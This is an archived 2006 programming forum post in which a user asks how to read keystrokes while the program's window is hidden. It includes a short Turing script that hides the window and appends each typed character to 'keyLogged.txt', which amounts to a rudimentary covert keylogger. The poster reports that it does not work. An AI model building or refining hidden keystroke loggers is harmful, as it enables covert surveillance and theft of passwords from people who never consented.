Input And Hide Window
Posted: Sat May 20, 2006 2:01 pm
Is it possible to read keystrokes while the window is hidden? It says it's impossible! Here's my code:
Code: Select all
var file : int
var ch : char
Window.Hide (defWinID)
loop
if hasch then
ch := getchar
put ch ..
open : file, "keyLogged.txt", put, mod, seek
seek : file, *
put : file, ch ..
close : file
end if
end loop
[code]
[color=#888888][size=85]Archived topic from Iceteks, old topic ID:4356, old post ID:35047[/size][/color]